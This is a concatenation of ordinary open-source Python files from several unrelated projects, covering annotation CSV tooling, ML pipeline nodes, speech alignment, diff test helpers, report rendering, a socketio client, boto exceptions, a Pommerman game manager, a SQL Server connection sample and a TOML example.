return trace_suite
if __name__ == '__main__':
suite = generate_test_suite_from_traces()
unittest.TextTestRunner().run(suite)
|
acl2020_submission/annotation_tools/tools/construct_input_for_turk.py | yjernite/craftassist | 626 | 11155978 | <gh_stars>100-1000
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import argparse
from annotation_tool_1 import MAX_WORDS
def print_csv_format(filename, option_num):
if option_num == 1:
# level 1
print("command", *["word{}".format(i) for i in range(MAX_WORDS)], sep=",")
with open(filename) as f:
for line in f.readlines():
command = line.replace(",", "").strip()
# This is default option for plain text to be rendered.
words = command.split()
print(command, *words, *([""] * (MAX_WORDS - len(words))), sep=",")
elif option_num == 2:
# level 2
print(
"command", "intent", "child", *["word{}".format(i) for i in range(MAX_WORDS)], sep=","
)
with open(filename) as f:
for line in f.readlines():
command = line.replace(",", "").strip()
# This option is if we need highlighted text to be rendered
# file will have : text + "\t" + text with spans in for highlighted words
parts = command.split("\t")
words = parts[0].split()
intent = parts[2]
child = parts[3]
print(parts[1], intent, child, *words, *([""] * (MAX_WORDS - len(words))), sep=",")
elif option_num == 3:
# qualification test
print(
"command_1",
*["word1{}".format(i) for i in range(MAX_WORDS)],
"command_2",
*["word2{}".format(i) for i in range(MAX_WORDS)],
"command_3",
*["word3{}".format(i) for i in range(MAX_WORDS)],
sep=","
)
with open(filename) as f:
l = []
for line in f.readlines():
command = line.replace(",", "").strip()
# This is default option for plain text to be rendered.
words = command.split()
l.append(",".join([command, *words, *([""] * (MAX_WORDS - len(words)))]))
print(",".join(l))
elif option_num == 4:
# composite command tool
print("sentence")
with open(filename) as f:
for line in f.readlines():
line = line.strip()
print(line)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input_file", type=str, required=True)
parser.add_argument("--tool_num", type=int, default=1)
args = parser.parse_args()
print_csv_format(args.input_file, args.tool_num)
|
autoPyTorch/pipeline/nodes/optimizer_selector.py | mens-artis/Auto-PyTorch | 1,657 | 11155985 | <filename>autoPyTorch/pipeline/nodes/optimizer_selector.py<gh_stars>1000+
__author__ = "<NAME>, <NAME> and <NAME>"
__version__ = "0.0.1"
__license__ = "BSD"
from autoPyTorch.pipeline.base.pipeline_node import PipelineNode
from autoPyTorch.components.optimizer.optimizer import AutoNetOptimizerBase
import torch.nn as nn
import ConfigSpace
import ConfigSpace.hyperparameters as CSH
from autoPyTorch.utils.configspace_wrapper import ConfigWrapper
from autoPyTorch.utils.config.config_option import ConfigOption
class OptimizerSelector(PipelineNode):
def __init__(self):
super(OptimizerSelector, self).__init__()
self.optimizer = dict()
def fit(self, hyperparameter_config, network):
config = ConfigWrapper(self.get_name(), hyperparameter_config)
optimizer_type = self.optimizer[config["optimizer"]]
optimizer_config = ConfigWrapper(config["optimizer"], config)
return {'optimizer': optimizer_type(network.parameters(), optimizer_config)}
def add_optimizer(self, name, optimizer_type):
if (not issubclass(optimizer_type, AutoNetOptimizerBase)):
raise ValueError("optimizer type has to inherit from AutoNetOptimizerBase")
self.optimizer[name] = optimizer_type
def remove_optimizer(self, name):
del self.optimizer[name]
def get_hyperparameter_search_space(self, dataset_info=None, **pipeline_config):
pipeline_config = self.pipeline.get_pipeline_config(**pipeline_config)
cs = ConfigSpace.ConfigurationSpace()
possible_optimizer = set(pipeline_config["optimizer"]).intersection(self.optimizer.keys())
selector = cs.add_hyperparameter(CSH.CategoricalHyperparameter("optimizer", sorted(possible_optimizer)))
for optimizer_name, optimizer_type in self.optimizer.items():
if (optimizer_name not in possible_optimizer):
continue
optimizer_cs = optimizer_type.get_config_space(
**self._get_search_space_updates(prefix=optimizer_name))
cs.add_configuration_space( prefix=optimizer_name, configuration_space=optimizer_cs, delimiter=ConfigWrapper.delimiter,
parent_hyperparameter={'parent': selector, 'value': optimizer_name})
self._check_search_space_updates(possible_optimizer, "*")
return cs
def get_pipeline_config_options(self):
options = [
ConfigOption(name="optimizer", default=list(self.optimizer.keys()), type=str, list=True, choices=list(self.optimizer.keys())),
]
return options
|
python/dgl/backend/tensorflow/sparse_optim.py | ketyi/dgl | 9,516 | 11156002 | <reponame>ketyi/dgl
"""Sparse optimizer is not supported for tensorflow""" |
malaya_speech/utils/aligner.py | huseinzol05/malaya-speech | 111 | 11156023 | import numpy as np
def beta_binomial_prior_distribution(phoneme_count, mel_count, scaling_factor=1.0):
from scipy.stats import betabinom
x = np.arange(0, phoneme_count)
mel_text_probs = []
for i in range(1, mel_count + 1):
a, b = scaling_factor * i, scaling_factor * (mel_count + 1 - i)
mel_i_prob = betabinom(phoneme_count, a, b).pmf(x)
mel_text_probs.append(mel_i_prob)
return np.array(mel_text_probs)
def mas(attn_map, width=1):
# assumes mel x text
opt = np.zeros_like(attn_map)
attn_map = np.log(attn_map)
attn_map[0, 1:] = -np.inf
log_p = np.zeros_like(attn_map)
log_p[0, :] = attn_map[0, :]
prev_ind = np.zeros_like(attn_map, dtype=np.int64)
for i in range(1, attn_map.shape[0]):
for j in range(attn_map.shape[1]):
prev_j = np.arange(max(0, j - width), j + 1)
prev_log = np.array([log_p[i - 1, prev_idx] for prev_idx in prev_j])
ind = np.argmax(prev_log)
log_p[i, j] = attn_map[i, j] + prev_log[ind]
prev_ind[i, j] = prev_j[ind]
# now backtrack
curr_text_idx = attn_map.shape[1] - 1
for i in range(attn_map.shape[0] - 1, -1, -1):
opt[i, curr_text_idx] = 1
curr_text_idx = prev_ind[i, curr_text_idx]
opt[0, curr_text_idx] = 1
assert opt.sum(0).all()
assert opt.sum(1).all()
return opt
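# Illustrative usage (not part of the original module):
#     prior = beta_binomial_prior_distribution(phoneme_count=6, mel_count=20)
#     prior.shape  # -> (20, 6): one row per mel frame, one column per phoneme
# `mas` then turns such a soft (mel x text) map into a hard 0/1 alignment of
# the same shape in which every mel frame selects one text token and the
# selected token index never decreases from one frame to the next.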
def binarize_attention(attn, in_len, out_len):
b_size = attn.shape[0]
attn_cpu = attn
attn_out = np.zeros_like(attn)
for ind in range(b_size):
hard_attn = mas(attn_cpu[ind, 0, : out_len[ind], : in_len[ind]])
attn_out[ind, 0, : out_len[ind], : in_len[ind]] = hard_attn
return attn_out
|
tests/helpers.py | fernandobrito/diff_cover | 276 | 11156053 | """
Test helper functions.
"""
import os.path
import random
HUNK_BUFFER = 2
MAX_LINE_LENGTH = 300
LINE_STRINGS = ["test", "+ has a plus sign", "- has a minus sign"]
def fixture_path(rel_path):
"""
Returns the absolute path to a fixture file
given `rel_path` relative to the fixture directory.
"""
fixture_dir = os.path.join(os.path.dirname(__file__), "fixtures")
return os.path.join(fixture_dir, rel_path)
def load_fixture(rel_path, encoding=None):
"""
Return the contents of the file at `rel_path`
(relative path to the "fixtures" directory).
If `encoding` is not None, attempts to decode
the contents as `encoding` (e.g. 'utf-8').
"""
with open(fixture_path(rel_path), encoding=encoding or "utf-8") as fixture_file:
contents = fixture_file.read()
if encoding is not None and isinstance(contents, bytes):
contents = contents.decode(encoding)
return contents
def line_numbers(start, end):
"""
Return a list of line numbers, in [start, end] (inclusive).
"""
return list(range(start, end + 1))
def git_diff_output(diff_dict, deleted_files=None):
"""
Construct fake output from `git diff` using the description
defined by `diff_dict`, which is a dictionary of the form:
{
SRC_FILE_NAME: MODIFIED_LINES,
...
}
where `SRC_FILE_NAME` is the name of a source file in the diff,
and `MODIFIED_LINES` is a list of lines added or changed in the
source file.
`deleted_files` is a list of files that have been deleted
    The content of the source files is randomly generated.
    Returns a string.
"""
output = []
# Entries for deleted files
output.extend(_deleted_file_entries(deleted_files))
# Entries for source files
for (src_file, modified_lines) in diff_dict.items():
output.extend(_source_file_entry(src_file, modified_lines))
return "\n".join(output)
def _deleted_file_entries(deleted_files):
"""
Create fake `git diff` output for files that have been
deleted in this changeset.
`deleted_files` is a list of files deleted in the changeset.
Returns a list of lines in the diff output.
"""
output = []
if deleted_files is not None:
for src_file in deleted_files:
# File information
output.append(f"diff --git a/{src_file} b/{src_file}")
output.append("index 629e8ad..91b8c0a 100644")
output.append(f"--- a/{src_file}")
output.append("+++ b/dev/null")
# Choose a random number of lines
num_lines = random.randint(1, 30)
# Hunk information
output.append(f"@@ -0,{num_lines} +0,0 @@")
output.extend(["-" + _random_string() for _ in range(num_lines)])
return output
def _source_file_entry(src_file, modified_lines):
"""
Create fake `git diff` output for added/modified lines.
`src_file` is the source file with the changes;
`modified_lines` is the list of modified line numbers.
Returns a list of lines in the diff output.
"""
output = []
# Line for the file names
output.append(f"diff --git a/{src_file} b/{src_file}")
# Index line
output.append("index 629e8ad..91b8c0a 100644")
# Additions/deletions
output.append(f"--- a/{src_file}")
output.append(f"+++ b/{src_file}")
# Hunk information
for (start, end) in _hunks(modified_lines):
output.extend(_hunk_entry(start, end, modified_lines))
return output
def _hunk_entry(start, end, modified_lines):
"""
Generates fake `git diff` output for a hunk,
where `start` and `end` are the start/end lines of the hunk
and `modified_lines` is a list of modified lines in the hunk.
Just as `git diff` does, this will include a few lines before/after
the changed lines in each hunk.
"""
output = []
# The actual hunk usually has a few lines before/after
start -= HUNK_BUFFER
end += HUNK_BUFFER
start = max(start, 0)
# Hunk definition line
# Real `git diff` output would have different line numbers
# for before/after the change, but since we're only interested
# in after the change, we use the same numbers for both.
length = end - start
output.append("@@ -{0},{1} +{0},{1} @@".format(start, length))
# Output line modifications
for line_number in range(start, end + 1):
# This is a changed line, so prepend a + sign
if line_number in modified_lines:
# Delete the old line
output.append("-" + _random_string())
# Include the changed line
output.append("+" + _random_string())
# This is a line we didn't modify, so no + or - signs
# but prepend with a space.
else:
output.append(" " + _random_string())
return output
def _hunks(modified_lines):
"""
Given a list of line numbers, return a list of hunks represented
as `(start, end)` tuples.
"""
# Identify contiguous lines as hunks
hunks = []
last_line = None
for line in sorted(modified_lines):
# If this is contiguous with the last line, continue the hunk
# We're guaranteed at this point to have at least one hunk
if (line - 1) == last_line:
start, _ = hunks[-1]
hunks[-1] = (start, line)
# If non-contiguous, start a new hunk with just the current line
else:
hunks.append((line, line))
# Store the last line
last_line = line
return hunks
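# Illustrative example (not part of the original helpers):
#     _hunks([1, 2, 3, 7, 8])  # -> [(1, 3), (7, 8)]
#     git_diff_output({'src/foo.py': line_numbers(3, 5)}, deleted_files=['old.py'])
# returns fake `git diff` text containing a deletion entry for old.py and a
# single hunk (padded by HUNK_BUFFER lines on each side) covering lines 3-5
# of src/foo.py.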
def _random_string():
"""
    Return a random line of text chosen from `LINE_STRINGS`.
"""
return random.choice(LINE_STRINGS)
|
src/pandas_profiling/report/structure/variables/render_url.py | abhicantdraw/pandas-profiling | 8,107 | 11156066 | <reponame>abhicantdraw/pandas-profiling
from pandas_profiling.config import Settings
from pandas_profiling.report.formatters import fmt, fmt_bytesize, fmt_percent
from pandas_profiling.report.presentation.core import (
Container,
FrequencyTable,
FrequencyTableSmall,
Table,
VariableInfo,
)
from pandas_profiling.report.presentation.frequency_table_utils import freq_table
from pandas_profiling.report.structure.variables.render_common import render_common
def render_url(config: Settings, summary: dict) -> dict:
varid = summary["varid"]
n_freq_table_max = config.n_freq_table_max
n_obs_cat = config.vars.cat.n_obs
redact = config.vars.cat.redact
template_variables = render_common(config, summary)
keys = ["scheme", "netloc", "path", "query", "fragment"]
for url_part in keys:
template_variables[f"freqtable_{url_part}"] = freq_table(
freqtable=summary[f"{url_part}_counts"],
n=summary["n"],
max_number_to_print=n_freq_table_max,
)
full_frequency_table = FrequencyTable(
template_variables["freq_table_rows"],
name="Full",
anchor_id=f"{varid}full_frequency",
redact=redact,
)
scheme_frequency_table = FrequencyTable(
template_variables["freqtable_scheme"],
name="Scheme",
anchor_id=f"{varid}scheme_frequency",
redact=redact,
)
netloc_frequency_table = FrequencyTable(
template_variables["freqtable_netloc"],
name="Netloc",
anchor_id=f"{varid}netloc_frequency",
redact=redact,
)
path_frequency_table = FrequencyTable(
template_variables["freqtable_path"],
name="Path",
anchor_id=f"{varid}path_frequency",
redact=redact,
)
query_frequency_table = FrequencyTable(
template_variables["freqtable_query"],
name="Query",
anchor_id=f"{varid}query_frequency",
redact=redact,
)
fragment_frequency_table = FrequencyTable(
template_variables["freqtable_fragment"],
name="Fragment",
anchor_id=f"{varid}fragment_frequency",
redact=redact,
)
items = [
full_frequency_table,
scheme_frequency_table,
netloc_frequency_table,
path_frequency_table,
query_frequency_table,
fragment_frequency_table,
]
template_variables["bottom"] = Container(
items, sequence_type="tabs", name="url stats", anchor_id=f"{varid}urlstats"
)
# Element composition
info = VariableInfo(
summary["varid"],
summary["varname"],
"URL",
summary["alerts"],
summary["description"],
)
table = Table(
[
{
"name": "Distinct",
"value": fmt(summary["n_distinct"]),
"alert": "n_distinct" in summary["alert_fields"],
},
{
"name": "Distinct (%)",
"value": fmt_percent(summary["p_distinct"]),
"alert": "p_distinct" in summary["alert_fields"],
},
{
"name": "Missing",
"value": fmt(summary["n_missing"]),
"alert": "n_missing" in summary["alert_fields"],
},
{
"name": "Missing (%)",
"value": fmt_percent(summary["p_missing"]),
"alert": "p_missing" in summary["alert_fields"],
},
{
"name": "Memory size",
"value": fmt_bytesize(summary["memory_size"]),
"alert": False,
},
]
)
fqm = FrequencyTableSmall(
freq_table(
freqtable=summary["value_counts_without_nan"],
n=summary["n"],
max_number_to_print=n_obs_cat,
),
redact=redact,
)
template_variables["top"] = Container([info, table, fqm], sequence_type="grid")
return template_variables
|
test/fixtures/python/matching/docstrings.py | matsubara0507/semantic | 8,844 | 11156075 | def foo():
"""here's a docstring"""
pass
def bar():
"""and another"""
pass
|
examples/client/threads/fiddle_client.py | flocko-motion/python-socketio | 2,977 | 11156076 | import socketio
sio = socketio.Client()
@sio.event
def connect():
print('connected to server')
@sio.event
def disconnect():
print('disconnected from server')
@sio.event
def hello(a, b, c):
print(a, b, c)
if __name__ == '__main__':
sio.connect('http://localhost:5000', auth={'token': '<PASSWORD>'})
sio.wait()
|
tests/trac/test-trac-0232.py | eLBati/pyxb | 123 | 11156087 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.utils.domutils
from pyxb.utils import six
from xml.dom import Node
import os.path
xsd='''<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:complexType name="tNumber">
<xs:simpleContent>
<xs:extension base="xs:double">
<xs:attribute name="scale" type="xs:int"/>
</xs:extension>
</xs:simpleContent>
</xs:complexType>
<xs:element name="number" type="tNumber"/>
<xs:element name="numbers">
<xs:complexType>
<xs:sequence>
<xs:element ref="number"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:schema>
'''
code = pyxb.binding.generate.GeneratePython(schema_text=xsd)
#print code
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
class TestTrac0232 (unittest.TestCase):
def testValid (self):
instance = CreateFromDocument('<numbers><number scale="2">1.5</number></numbers>')
self.assertEqual(1.5, instance.number.value())
self.assertEqual(2, instance.number.scale)
def testInvalidElement (self):
with self.assertRaises(pyxb.SimpleTypeValueError) as cm:
instance = CreateFromDocument('''<numbers>
<number>1x5</number>
</numbers>''')
e = cm.exception
# NB: Location is the start tag of the containing element
if e.location is not None:
self.assertEqual(2, e.location.lineNumber)
self.assertEqual(0, e.location.columnNumber)
def testInvalidAttribute (self):
with self.assertRaises(pyxb.SimpleTypeValueError) as cm:
instance = CreateFromDocument('''<numbers><number scale="c">1.5</number></numbers>''')
e = cm.exception
# NB: Location is the start tag of the containing element
if e.location is not None:
self.assertEqual(1, e.location.lineNumber)
self.assertEqual(9, e.location.columnNumber)
if __name__ == '__main__':
unittest.main()
|
boto/beanstalk/exception.py | Yurzs/boto | 5,079 | 11156124 | <reponame>Yurzs/boto
import sys
from boto.compat import json
from boto.exception import BotoServerError
def simple(e):
code = e.code
if code.endswith('Exception'):
        code = code[:-len('Exception')]
try:
# Dynamically get the error class.
simple_e = getattr(sys.modules[__name__], code)(e)
except AttributeError:
# Return original exception on failure.
return e
return simple_e
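# Illustrative behaviour (not part of the original module): a BotoServerError
# whose code is 'TooManyApplicationsException' is converted into an instance
# of the TooManyApplications class defined below, while an unrecognised code
# hits the AttributeError branch and the original exception is returned.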
class SimpleException(BotoServerError):
def __init__(self, e):
super(SimpleException, self).__init__(e.status, e.reason, e.body)
self.error_message = self.message
def __repr__(self):
return self.__class__.__name__ + ': ' + self.error_message
def __str__(self):
return self.__class__.__name__ + ': ' + self.error_message
class ValidationError(SimpleException): pass
# Common beanstalk exceptions.
class IncompleteSignature(SimpleException): pass
class InternalFailure(SimpleException): pass
class InvalidAction(SimpleException): pass
class InvalidClientTokenId(SimpleException): pass
class InvalidParameterCombination(SimpleException): pass
class InvalidParameterValue(SimpleException): pass
class InvalidQueryParameter(SimpleException): pass
class MalformedQueryString(SimpleException): pass
class MissingAction(SimpleException): pass
class MissingAuthenticationToken(SimpleException): pass
class MissingParameter(SimpleException): pass
class OptInRequired(SimpleException): pass
class RequestExpired(SimpleException): pass
class ServiceUnavailable(SimpleException): pass
class Throttling(SimpleException): pass
# Action specific exceptions.
class TooManyApplications(SimpleException): pass
class InsufficientPrivileges(SimpleException): pass
class S3LocationNotInServiceRegion(SimpleException): pass
class TooManyApplicationVersions(SimpleException): pass
class TooManyConfigurationTemplates(SimpleException): pass
class TooManyEnvironments(SimpleException): pass
class S3SubscriptionRequired(SimpleException): pass
class TooManyBuckets(SimpleException): pass
class OperationInProgress(SimpleException): pass
class SourceBundleDeletion(SimpleException): pass
|
samples/tutorials/python/jupyter/sample_python_jupyter.py | manikanth/sql-server-samples | 4,474 | 11156130 | <reponame>manikanth/sql-server-samples
import pyodbc
server = 'myserver'
database = 'mydb'
username = 'myusername'
password = '<PASSWORD>'
#Connection String
connection = pyodbc.connect('DRIVER={SQL Server Native Client 11.0};SERVER='+server+';DATABASE='+database+';UID='+username+';PWD='+ password)
cursor = connection.cursor()
#Sample select query
cursor.execute("SELECT @@version;")
row = cursor.fetchone()
while row:
    print(row[0])
row = cursor.fetchone()
|
alipay/aop/api/response/KoubeiRetailWmsInboundorderBatchqueryResponse.py | snowxmas/alipay-sdk-python-all | 213 | 11156152 | <reponame>snowxmas/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.InboundOrderVO import InboundOrderVO
class KoubeiRetailWmsInboundorderBatchqueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiRetailWmsInboundorderBatchqueryResponse, self).__init__()
self._inbound_order_vo_list = None
@property
def inbound_order_vo_list(self):
return self._inbound_order_vo_list
@inbound_order_vo_list.setter
def inbound_order_vo_list(self, value):
if isinstance(value, list):
self._inbound_order_vo_list = list()
for i in value:
if isinstance(i, InboundOrderVO):
self._inbound_order_vo_list.append(i)
else:
self._inbound_order_vo_list.append(InboundOrderVO.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(KoubeiRetailWmsInboundorderBatchqueryResponse, self).parse_response_content(response_content)
if 'inbound_order_vo_list' in response:
self.inbound_order_vo_list = response['inbound_order_vo_list']
|
tests/test_dict_loading.py | insolor/pymorphy2 | 859 | 11156181 | <reponame>insolor/pymorphy2
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import pytest
import pymorphy2
from pymorphy2.analyzer import lang_dict_path
def test_old_dictionaries_supported():
pytest.importorskip("pymorphy2_dicts")
m = pymorphy2.MorphAnalyzer(lang='ru-old')
assert m.lang == 'ru-old'
assert m.tag('стиль')[0].POS == 'NOUN'
def test_old_dictionaries_not_installed():
try:
import pymorphy2_dicts
pytest.skip("pymorphy2_dicts package is installed")
except ImportError:
pass
with pytest.raises(ValueError):
pymorphy2.MorphAnalyzer(lang='ru-old')
def test_old_dictionaries_supported_by_path():
pymorphy2_dicts = pytest.importorskip("pymorphy2_dicts")
m = pymorphy2.MorphAnalyzer(pymorphy2_dicts.get_path())
assert m.lang == 'ru'
assert m.tag('стиль')[0].POS == 'NOUN'
def test_morph_analyzer_bad_path():
with pytest.raises(IOError):
pymorphy2.MorphAnalyzer("/sdfgsd/gdsfgsdfg/dfgdsfg/dsfgsdfg/as")
def test_language_from_dict():
ru_path = lang_dict_path('ru')
m = pymorphy2.MorphAnalyzer(path=ru_path)
assert m.lang == 'ru'
def test_bad_language():
with pytest.raises(ValueError):
pymorphy2.MorphAnalyzer(lang='something-unsupported')
def test_nonmatching_language():
ru_path = lang_dict_path('ru')
m = pymorphy2.MorphAnalyzer(path=ru_path, lang='uk')
assert 'Init' in m.parse('Ї')[0].tag
assert m.lang == 'uk'
|
ports/nrf/freeze/test.py | sebastien-riou/micropython | 13,648 | 11156193 | import sys
def hello():
print("Hello %s!" % sys.platform)
|
manager/celery_.py | Jamie-505/playground | 725 | 11156201 | # TODO: Add Documentation.
from collections import defaultdict
import logging
import os
import random
import shutil
import sys
import time
import traceback
import docker
from celery import Celery
import requests
import subprocess
sys.path.insert(1, os.path.join(sys.path[0], '..'))
import pommerman
client = docker.from_env()
client.login(
os.getenv("PLAYGROUND_DOCKER_LOGIN"),
os.getenv("PLAYGROUND_DOCKER_PASSWORD"))
game_directory = os.path.expanduser('~/battles')
json_directory = os.path.join(game_directory, 'json')
png_directory = os.path.join(game_directory, 'png')
if not os.path.exists(json_directory):
os.makedirs(json_directory)
if not os.path.exists(png_directory):
os.makedirs(png_directory)
celery = Celery("playground")
celery.conf.broker_url = 'redis://localhost:6379/0'
@celery.task
def run_test(docker_build_path, github_repo, private_key, name, agent_id, user,
config):
user = user.lower()
name = name.lower()
record_pngs_dir = os.path.join(png_directory, 'test-%s-%s' % (user, name))
record_json_dir = os.path.join(json_directory, 'test-%s-%s' % (user, name))
test = Test(name, user, config, private_key, github_repo, agent_id,
docker_build_path, record_pngs_dir, record_json_dir)
return test.run()
server_ready_notifs = defaultdict(set)
@celery.task
def add_server_ready_notif(notif):
"""Add this notification to the queue. Run battle if it completes a set."""
battle_info = notif['battle_info']
server_ready_notifs[battle_info].add(notif)
battle_notifs = server_ready_notifs[battle_info]
if len(battle_notifs) > 4:
logging.warn("We have too many battle notifs. How did this happen?")
logging.warn(", ".join([
"{}.{}.{}".format(notif['agent_id'], notif['aid'],
notif['docker_image']) for notif in battle_notifs
]))
elif len(battle_notifs) == 4:
# Everyone is ready. Let's do this.
battle_notifs = sorted(list(battle_notifs), key=lambda k: k['agent_id'])
agents = {k:v for k, v in battle_notifs \
if k in ['aid', 'docker_image', 'agent_id']}
run_battle(battle_info, agents)
del server_ready_notifs[battle_info]
# TODO: Ensure there is >1 worker to accept requests while battles occur.
@celery.task
def run_battle(battle_info, agents):
"""Agents is a list of dicts specifying docker image, aid, and agent_id."""
suffix = battle_info
record_pngs_dir = os.path.join(png_directory, suffix)
record_json_dir = os.path.join(json_directory, suffix)
battle = Battle(agents, record_pngs_dir, record_json_dir)
info = battle.run()
logging.warn("Info from the run_battle on %s:" % battle_info)
logging.warn(info)
# Tell the server about the result.
request_json = {
'result': info['result'].value,
'winners': info.get('winners', []),
'battle_info': battle_info,
'access': os.getenv("PLAYGROUND_GAME_MANAGER_ACCESS")
}
request_url = os.getenv("PLAYGROUND_SERVER_URL") + "/admin/report_result"
requests.post(request_url, json=request_json)
class Battle(object):
def __init__(self, agents, record_pngs_dir, record_json_dir):
"""A battle object.
Args:
agents: A list of dicts with agent_id, aid, and docker_image.
record_pngs_dir: The string directory path to place recorded pngs.
record_json_dir: The string directory path to place recorded json.
"""
self._agents = agents
self._record_pngs_dir = record_pngs_dir
self._record_json_dir = record_json_dir
def run(self):
# At this point, we can assume that the containers have been pulled.
# We now start the game, which notifies those containers to start the
# agents and let us know they're ready.
agents = [
"docker::%s" % agent['docker_image'] for agent in self._agents
]
agents = ",".join(agents)
args = Args(
agents,
self._config,
self._record_pngs_dir,
self._record_json_dir,
agent_env_vars,
None,
render,
do_sleep=False)
seed = os.getenv("PLAYGROUND_GAME_SEED")
infos = pommerman.cli.run_battle.run(args, num_times=1, seed=seed)
return infos[0]
# TODO: Add logging in case the post fails.
@staticmethod
def _fail(aids, error):
"""Sends ping to server that this was a failed battle."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/fail_battle'
requests.post(
request_url,
json={
"aids": aids,
"error": error,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
# TODO: Add logging in case the post fails.
@staticmethod
def _pass(aids, info):
"""Sends ping that this was a successful test."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/pass_battle'
requests.post(
request_url,
json={
"aids": aids,
"info": info,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
class Test(object):
def __init__(self, name, user, config, private_key, github_repo, agent_id,
docker_build_path, record_pngs_dir, record_json_dir):
self._name = name
self._user = user
self._config = config
self._private_key = private_key
self._github_repo = github_repo
self._agent_id = agent_id
self._docker_build_path = docker_build_path
self._record_pngs_dir = record_pngs_dir
self._record_json_dir = record_json_dir
def run(self):
img = None
message = None
for func in [
                lambda: save_ssh_pk(self._name, self._private_key),
                lambda: download_repo(self._name, self._github_repo),
                lambda: docker_build(self._docker_build_path, self._name,
                                     self._user),
lambda: self._battle(num_times=5, agent_env_vars={},
render=True, seed=1)
]:
# TODO: This won't be necessary if we can fix the image purging.
is_success, ret = func()
if type(ret) == docker.models.images.Image:
img = ret
else:
message = ret
if not is_success:
                return self._fail(self._agent_id, ret)
# This has been successful. Hurray.
# Push the Docker image to the cloud and then clean it up.
        docker_push_and_clean_up(img, self._name, self._user)
        return self._pass(self._agent_id, message)
# TODO: Add logging in case the post fails.
@staticmethod
def _fail(agent_id, error):
"""Sends ping to server that this was a failed test."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/fail_test'
requests.post(
request_url,
json={
"agent_id": agent_id,
"error": error,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
# TODO: Add logging in case the post fails.
@staticmethod
def _pass(agent_id, win_percent):
"""Sends ping that this was a successful test."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/pass_test'
requests.post(
request_url,
json={
"agent_id": agent_id,
"win_percent": win_percent,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
def _battle(self, num_times, agent_env_vars, render, seed=None):
return battle(num_times, agent_env_vars, render, seed, self._user,
self._name, self._config, self._record_pngs_dir,
self._record_json_dir)
def battle(num_times, agent_env_vars, render, seed, user, name, config,
record_pngs_dir, record_json_dir):
try:
agents = ["test::agents.SimpleAgent"] * 3
agent_id = random.randint(0, len(agents))
agent_tag = "docker::multiagentlearning/pommerman-%s-%s" % (user, name)
agents.insert(agent_id, agent_tag)
agents = ",".join(agents)
args = Args(
agents,
config,
record_pngs_dir,
record_json_dir,
agent_env_vars,
None,
render,
do_sleep=True)
infos = []
infos = pommerman.cli.run_battle.run(
args, num_times=num_times, seed=seed)
win_count = len([i for i in infos if 'winners' in i \
and agent_id in i['winners']])
win_percent = 1. * win_count / len(infos)
        return True, win_percent
except Exception as e:
traceback.print_exc()
return False, "battle: %s" % e
def save_ssh_pk(name, private_key):
try:
path = os.path.expanduser('~/.ssh/id_%s' % name)
if os.path.exists(path):
os.remove(path)
with os.fdopen(os.open(path, os.O_WRONLY | os.O_CREAT, 0o600),
'w') as f:
f.write(private_key)
return True, ""
except Exception as e:
return False, "save_ssh_pk: %s" % e
def download_repo(name, github_repo):
try:
directory = os.path.expanduser('~/Repos/%s' % name)
if os.path.exists(directory):
shutil.rmtree(directory)
from git import Repo
from git import Git
git_ssh_identity_file = os.path.expanduser('~/.ssh/id_%s' % name)
git_ssh_cmd = 'ssh -i %s' % git_ssh_identity_file
Repo.clone_from(
github_repo, directory, env={
'GIT_SSH_COMMAND': git_ssh_cmd
})
return True, ""
except Exception as e:
return False, "download_repo: %s" % e
def docker_build(docker_build_path, name, user):
try:
repo_path = os.path.join(os.path.expanduser('~/Repos'), name)
img = client.images.build(
path=repo_path,
dockerfile=docker_build_path,
tag='multiagentlearning/pommerman-%s-%s' % (user, name))
return True, img
except Exception as e:
return False, "docker_build: %s" % e
def docker_push_and_clean_up(img, name, user):
try:
client.images.push("multiagentlearning/pommerman-%s-%s" % (user, name))
# TODO: Fix this so that it purges correctly.
# ... Consider just using subprocess(docker system prune -a -f)
client.images.prune("%s-%s" % (user, name), filters={'dangling': False})
return True
except Exception as e:
print("push / clean up: ", e)
traceback.print_exc()
return False
class Args(object):
"""Args object to replicate the args in run_battle."""
def __init__(self, agents, config, record_pngs_dir, record_json_dir,
agent_env_vars, game_state_file, render, do_sleep):
self.config = config
self.record_pngs_dir = record_pngs_dir
self.record_json_dir = record_json_dir
self.agent_env_vars = agent_env_vars
self.game_state_file = game_state_file
self.render = render
self.render_mode = 'human'
self.agents = agents
self.do_sleep = do_sleep
|
example.py | zhiburt/rtoml | 136 | 11156217 | from datetime import datetime, timezone, timedelta
import rtoml
obj = {
'title': 'TOML Example',
'owner': {
'dob': datetime(1979, 5, 27, 7, 32, tzinfo=timezone(timedelta(hours=-8))),
'name': '<NAME>',
},
'database': {
'connection_max': 5000,
'enabled': True,
'ports': [8001, 8001, 8002],
'server': '192.168.1.1',
},
}
loaded_obj = rtoml.load("""\
# This is a TOML document.
title = "TOML Example"
[owner]
name = "<NAME>"
dob = 1979-05-27T07:32:00-08:00 # First class dates
[database]
server = "192.168.1.1"
ports = [8001, 8001, 8002]
connection_max = 5000
enabled = true
""")
assert loaded_obj == obj
assert rtoml.dumps(obj) == """\
title = "TOML Example"
[owner]
dob = 1979-05-27T07:32:00-08:00
name = "<NAME>"
[database]
connection_max = 5000
enabled = true
server = "192.168.1.1"
ports = [8001, 8001, 8002]
"""
|
